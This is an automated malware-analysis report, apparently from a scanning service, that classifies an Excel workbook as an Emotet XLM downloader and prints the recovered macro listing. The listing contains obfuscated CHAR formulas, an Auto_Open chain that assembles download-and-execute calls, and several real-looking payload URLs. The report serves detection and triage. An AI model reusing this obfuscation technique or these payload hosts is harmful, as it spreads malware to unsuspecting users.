Verdict: MALICIOUS
Risk Score: 200
Heuristics (4)
- ClamAV: Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 8189 bytes |

SHA-256: 1c4ca3ac7a958ad30d20e2cbe71ce64d8944a312564cef26f4a1a0bcd74ec445
Preview: first 1,000 lines of the extracted script

```text
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Sheet
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.SINGLE hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 58 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G3
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Sheet,E2,CHAR(216/2),""
' Sheet,K2,CHAR(35*2),""
' Sheet,S2,CHAR(100-35),""
' Sheet,B3,CHAR(236-118),""
' Sheet,I3,CHAR(238/2),""
' Sheet,O3,CHAR(134/2),""
' Sheet,U3,"",5.00000000000000000000
' Sheet,A4,CHAR(228/2),""
' Sheet,M4,CHAR(148/2),""
' Sheet,Q4,"",1.00000000000000000000
' Sheet,T4,CHAR(42*2),""
' Sheet,J5,CHAR(52*2),""
' Sheet,S5,CHAR(100/2),""
' Sheet,D6,CHAR(185-110),""
' Sheet,Q6,CHAR(220-111),""
' Sheet,L7,CHAR(170/2),""
' Sheet,V7,CHAR(224/2),""
' Sheet,G8,CHAR(109-40),""
' Sheet,M8,CHAR(200-100),""
' Sheet,P8,CHAR(232/2),""
' Sheet,T9,CHAR(194/2),""
' Sheet,F10,CHAR(203-102),""
' Sheet,K10,CHAR(164-82),""
' Sheet,B11,CHAR(220/2),""
' Sheet,H11,"",4.00000000000000000000
' Sheet,O11,CHAR(96/2),""
' Sheet,Q11,CHAR(136/2),""
' Sheet,H13,CHAR(166/2),""
' Sheet,L13,CHAR(33*2),""
' Sheet,S13,CHAR(210/2),""
' Sheet,E14,CHAR(240-120),""
' Sheet,F14,"",3.00000000000000000000
' Sheet,N14,CHAR(217-100),""
' Sheet,P15,CHAR(202-103),""
' Sheet,C16,CHAR(206-103),""
' Sheet,M16,CHAR(152-76),""
' Sheet,T16,CHAR(242/2),""
' Sheet,R17,CHAR(212-101),""
' Sheet,O18,CHAR(230/2),""
' Sheet,U21,"",1.00000000000000000000
' Sheet,F28,CHAR(32),""
' Sheet,R3,T( Shee!S2& Shee!F24& Shee!F26& Shee!F24& Shee!M4& Shee!M4& Shee!O3& Shee!O3& Shee!L13& Shee!L13& Shee!F24),""
' Sheet,F6,T( Shee!L30& Shee!F24& Shee!N14& Shee!A4& Shee!E2& Shee!Q6& Shee!R17),""
' Sheet,N19,T( Shee!B11& Shee!F24& Shee!F26& Shee!F24& Shee!L7& Shee!K10& Shee!M16& Shee!Q11& Shee!R17& Shee!I3& Shee!B11& Shee!E2& Shee!R17& Shee!T9& Shee!M8& Shee!T4& Shee!R17& Shee!K2& Shee!S13& Shee!E2),""
' Sheet,F26,T( Sheet!H10& Sheet!H14& Sheet!E21),""
' Sheet,I27,T( Sheet!L10& Sheet!L14& Sheet!E21),""
' Sheet,G28,T( Sheet!J10& Sheet!J14& Sheet!E21),""
' Sheet,J29,T( Sheet!N10& Sheet!N14& Sheet!E21),""
' Sheet,D5,T("System32\"),""
' Sheet,L8,T( Shee!F28& Shee!H28& Shee!H28& Shee!H26),""
' Sheet,R13,T( Shee!H28& Shee!H28& Shee!H26),""
' Sheet,J14,T( Shee!F10& Shee!C16& Shee!O18& Shee!B3),""
' Sheet,F19,T(":\Windows\"),""
' Sheet,M26,T( Shee!F24& Shee!F26& Shee!O11& Shee!F26& Shee!O11& Shee!L31),""
' Sheet,C32,T( Shee!F14& Shee!S5& Shee!H28& Shee!F10& Shee!E14),""
' Sheet,H7,"",1.00000000000000000000
' Sheet,J7,"",2.00000000000000000000
' Sheet,L7,"",3.00000000000000000000
' Sheet,N7,"",4.00000000000000000000
' Sheet,H10,"['"://helpeve.com/multiw"', 'TEXT(56656436466735.00000000000000000000)']",""
' Sheet,J10,"['"://hsweixintp.com/wp-adm"', 'TEXT(144552434315.00000000000000000000)']",""
' Sheet,L10,"['"://9hym.com/images/SXVI"', 'TEXT(432331536243.00000000000000000000)']",""
' Sheet,N10,"['"://yuanliao.raluking.com/over"', 'TEXT(574354525236.00000000000000000000)']",""
' Sheet,H14,"['"p/cxpkaAkAKPRUs4KL/"', 'TEXT(7656364755466430.00000000000000000000)']",""
' Sheet,J14,"['"in/3c2etiFC2RwmHfTS/"', 'TEXT(5754235354625.00000000000000000000)']",""
' Sheet,L14,"['"e4tbJw8ZCfa4TEt/"', 'TEXT(464253243255325.00000000000000000000)']",""
' Sheet,N14,"['"emotionality/Vfc9v1ebcmaEguw/"', 'TEXT(645422525431.00000000000000000000)']",""
' Sheet,E21,T( Shee!F24& Shee!F26& Shee!F24),""
' Sheet,J3,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!F14& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
' Sheet,E9,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!Q4& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
' Sheet,L12,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!H11& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
' Sheet,G15,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!S5& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
' Sheet,Q21,T( Shee!F26& Shee!O11& Shee!F26& Shee!F24& Shee!I15& Shee!P8& Shee!P8& Shee!G17),""
' Sheet,G13,"FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!F26& Sheet!R13& Sheet!E9& Sheet!M26,G16)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!E9& Shee!F24& Shee!L31,G18)=FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!G28& Sheet!R13& Sheet!G15& Sheet!M26,G20)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!G15& Shee!F24& Shee!L31,G22)=FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!I27& Sheet!R13& Sheet!J3& Sheet!M26,G24)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!J3& Shee!F24& Shee!L31,G26)=FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!J29& Sheet!R13& Sheet!L12& Sheet!M26,G28)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!L12& Shee!F24& Shee!L31,G30)=FORMULA( Shee!L24& Shee!G44& Shee!H46& Shee!J44,G36)",""
```